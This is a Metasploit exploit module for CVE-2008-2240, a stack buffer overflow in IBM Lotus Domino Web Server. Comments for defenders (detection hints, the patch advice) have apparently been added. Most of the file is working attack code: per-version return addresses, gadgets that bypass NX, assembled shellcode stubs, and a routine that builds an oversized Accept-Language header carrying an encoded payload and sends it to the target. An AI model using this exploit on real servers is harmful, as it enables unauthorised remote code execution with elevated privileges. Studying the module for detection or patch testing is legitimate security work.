IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow



##

# $Id: domino_http_accept_language.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Exploit module for CVE-2008-2240 (see 'References'): the Domino HTTP task
# copies the Accept-Language request header into a fixed-size stack buffer,
# and a header longer than 114 bytes overruns it (per 'Description'). Affected
# releases are those prior to 7.0.3FP1 and 8.0.1; the vendor advisory is the
# 'URL' reference below, and upgrading to a fixed release is the remediation.
#
# Defender notes, grounded in what this module sends: a single GET for a random
# sixteen-letter *.nsf path whose query string is one high-ASCII byte, carrying
# an Accept-Language header that is well over 114 bytes long and contains NUL
# and other non-ASCII bytes, plus a fixed header set (MSIE 6.0 User-Agent,
# Keep-Alive 300). A length/character-set rule on Accept-Language, or an HTTP
# log search for oversized Accept-Language values against .nsf paths, will
# surface this traffic.
class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking

    include Msf::Exploit::Remote::HttpClient

    # Registers the module metadata and its one extra option.
    #
    # @param info [Hash] module metadata merged via update_info before being
    #   passed to the parent constructor.
    #
    # Besides what HttpClient already provides, the only option added here is
    # RPORT, defaulting to 80.
    def initialize(info = {})
        super(update_info(info,
            'Name'            => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
            'Description'        => %q{
                    This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
                prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
                request with an Accept-Language header greater than 114 bytes.
            },
            'Author'        => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 10998 $',
            'References'        =>
                [
                    ['CVE', '2008-2240'],
                    ['OSVDB', '45415'],
                    ['BID', '29310'],
                    ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
                ],
            'DefaultOptions'    =>
                {
                    'EXITFUNC'    => 'thread',
                },
            'Privileged'        => true,
            # BadChars: NUL, LF, space, comma and semicolon -- presumably the bytes
            # that would terminate or split an HTTP header value; not verified here.
            'Payload'        =>
                {
                    'Space'            => 800,
                    'BadChars'        => "\x00\x0a\x20\x2c\x3b",
                    'StackAdjustment'    => -3500,
                },
            'Platform'        =>    'win',
            # Each target supplies the module-specific addresses that #exploit
            # reads. The "(NX)" entries carry six keys; the "(NO NX)" entries carry
            # only 'FixESP' and 'JmpESP', and #exploit branches on the presence of
            # 'DisableNX' to choose which layout to build. All addresses are tied
            # to the exact Domino release and Windows service pack named in the
            # target title.
            'Targets'        =>
                [

                    ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
                        {
                            'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
                            'FixESI'    => 0x603055da, # push esp, pop esi, ret        @nnotes.dll
                            'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10    @nnotes.dll
                            'Ret'        => 0x62c838c7, # ret 0x12e            @nlsccstr.dll
                            'DisableNX'    => 0x7c83e413, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
                        {
                            'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
                            'FixESI'    => 0x603055da, # push esp, pop esi, ret        @nnotes.dll
                            'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10    @nnotes.dll
                            'Ret'        => 0x62c838c7, # ret 0x12e            @nlsccstr.dll
                            'DisableNX'    => 0x7c83f517, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
                        {
                            'FixESP'    => 0x70335c79, # add esp, 0x324, ret         @fontmanager.dll
                            'JmpESP'    => 0x62c6072e, # jmp esp            @nlsccstr.dll (same address as the NX targets above)
                        }
                    ],

                    ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
                        {
                            'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
                            'FixESI'    => 0x639a7f87, # push esp, pop esi, ret        @nlsccstr.dll
                            'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10    @nlsccstr.dll
                            'Ret'        => 0x7f8b0628, # ret 0x12e            @j9gc23.dll
                            'DisableNX'    => 0x7c83e413, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x6391071e, # jmp esp             @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
                        {
                            'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
                            'FixESI'    => 0x639a7f87, # push esp, pop esi, ret        @nlsccstr.dll
                            'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10    @nlsccstr.dll
                            'Ret'        => 0x7f8b0628, # ret 0x12e            @j9gc23.dll
                            'DisableNX'    => 0x7c83f517, # NX Disable            @ntdll.dll
                            'JmpESP'    => 0x6391071e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                    ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
                        {
                            'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret        @net.dll
                            'JmpESP'    => 0x6391071e, # jmp esp            @nlsccstr.dll
                        }
                    ],

                ],
            'DisclosureDate' => 'May 20 2008'))

        register_options( [ Opt::RPORT(80) ], self.class )
    end

    # Builds and sends the single malicious GET request.
    #
    # The Accept-Language value starts as 116 random alphanumerics, has
    # target-specific values written at fixed offsets, and is then followed by
    # a NUL byte and the encoded payload -- so it is always far longer than the
    # 114-byte limit named in 'Description'. Which offsets are patched depends
    # on whether the selected target defines 'DisableNX' (the "(NX)" targets do,
    # the "(NO NX)" targets do not).
    #
    # NOTE(review): the trailing "# 1" .. "# 8" markers on the lines below look
    # like the author's intended execution order of the pieces they place;
    # inferred from the layout, not verified here.
    #
    # Side effects: opens the HTTP connection, sends one request, hands off to
    # the payload handler, then closes the connection. The return value (that of
    # disconnect) is not used.
    def exploit
        connect

        # 116-byte random alphanumeric base for the Accept-Language header.
        lang = rand_text_alphanumeric(116)                # greetz to hateful chris
        lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')            # Fix Second crash (esi)
        lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')            # Fix Second crash (eax)
        lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')            # Fix First crash
        lang[ 112, 4 ] = [target['FixESP']].pack('V')            # 1
        # A NUL byte, then the encoded payload (up to 'Space' = 800 bytes).
        lang << "\x00"
        lang << payload.encoded

        if(not target['DisableNX'])
            # "(NO NX)" targets: only 'FixESP' and 'JmpESP' are available.
            lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string        # 4
            lang[ 80,  4 ] = [target['JmpESP']].pack('V')        # 2
            lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)    # 3 jmp back to top
        else
            # "(NX)" targets: the longer layout using all six target addresses.
            lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string    # 8
            lang[ 80,  4 ] = [target['FixESI']].pack('V')        # 2
            lang[ 84,  4 ] = [target['FixEBP']].pack('V')        # 3
            lang[ 88,  4 ] = [target['Ret']].pack('V')        # 4
            lang[ 92,  4 ] = [target['JmpESP']].pack('V')        # 6
            lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)    # 7  jmp back to top
            lang[ 108, 4 ] = [target['DisableNX']].pack('V')    # 5
        end

        # Random sixteen-letter .nsf path with a single high-ASCII query byte;
        # the author labels this the trigger. From a detection standpoint a GET
        # for a non-existent random *.nsf with a non-ASCII query is itself unusual.
        uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)    # Trigger

        print_status("Trying target #{target.name}...")
        # One request is enough ('Description': any request with an oversized
        # Accept-Language triggers the flaw). The 5 is the response timeout in
        # seconds. NOTE(review): "#{uri}" and "#{lang}" merely copy the strings;
        # the interpolation is unnecessary. The remaining headers are static and
        # therefore fingerprintable.
        send_request_raw({
                        'uri'            => "#{uri}",
                        'method'        => 'GET',
                        'headers'        =>
                        {
                            'Accept'        => '*/*',
                            'Accept-Language'    => "#{lang}",
                            'Accept-Encoding'    => 'gzip,deflate',
                            'Keep-Alive'        => '300',
                            'Connection'        => 'keep-alive',
                            'User-Agent'        => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
                        }
                    }, 5)
        # Hand off to the payload handler, then close the HTTP socket.
        handler
        disconnect
    end
end